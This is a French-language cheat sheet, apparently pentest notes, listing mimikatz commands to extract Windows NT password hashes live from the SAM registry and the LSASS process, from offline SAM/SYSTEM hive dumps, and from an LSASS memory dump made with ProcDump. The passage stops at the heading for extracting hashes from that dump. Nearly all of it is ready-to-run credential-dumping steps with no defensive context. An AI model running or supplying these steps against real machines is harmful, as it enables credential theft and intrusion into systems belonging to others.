Télécharger l’outil : https://github.com/ParrotSec/mimikatz

Extraction Live

Extraction depuis le registre SAM

# CMD en tant qu'administrateur

# Lancer mimikatz
CMD> mimikatz.exe

# Logguer les résultats de l'utilisation de mimikatz
mimikatz> log

# Attribuer les privilèges nécessaires à mimikatz
mimikatz> privilege::debug

#Extraire les hashs NT depuis le registre SAM
mimikatz> lsadump::sam

Extraction depuis le processus lsass.exe

# CMD en tant qu'administrateur

# Lancer mimikatz
CMD> mimikatz.exe

# Logguer les résultats de l'utilisation de mimikatz
mimikatz> log

# Attribuer les privilèges nécessaires à mimikatz
mimikatz> privilege::debug

# Extraire les hashs NT depuis le processus LSASS
mimikatz> sekurlsa::logonpasswords

Extraction depuis un dump

Extraction depuis un dump des registres SAM et SYSTEM

Il faut au préalable avoir extrait les registres SAM et SYSTEM avec un outil comme FTK Imager.

# CMD en tant qu'administrateur

# Lancer mimikatz
CMD> mimikatz.exe

# Logguer les résultats de l'utilisation de mimikatz
mimikatz> log

# Extraire les hashs NT
lsadump::sam /system:"C:\\Users\\Paul\\Path\\system" /sam:"C:\\Users\\Paul\\Path\\sam"

Extraction depuis un dump du processus lsass.exe

Récupérer un dump du processus lsass.exe

1. Télécharger ProcDump depuis le site de Sysinternals.
2. Identifier le PID de LSASS :

   • Ouvrir un terminal et taper :

     tasklist | findstr lsass.exe
     

   • Noter le PID du processus lsass.exe.

3. Lancez ProcDump pour créer un dump :

   • Exécutez la commande suivante pour créer le dump :

     procdump.exe -ma <PID> C:\\chemin\\lsass.dmp
     

     • ma : Effectue un dump complet (full dump).
     • <PID> : Remplacez par le PID trouvé précédemment.
     • C:\\chemin\\lsass.dmp : Spécifiez le chemin où le fichier dump sera sauvegardé.

Extraire les hashs depuis le dump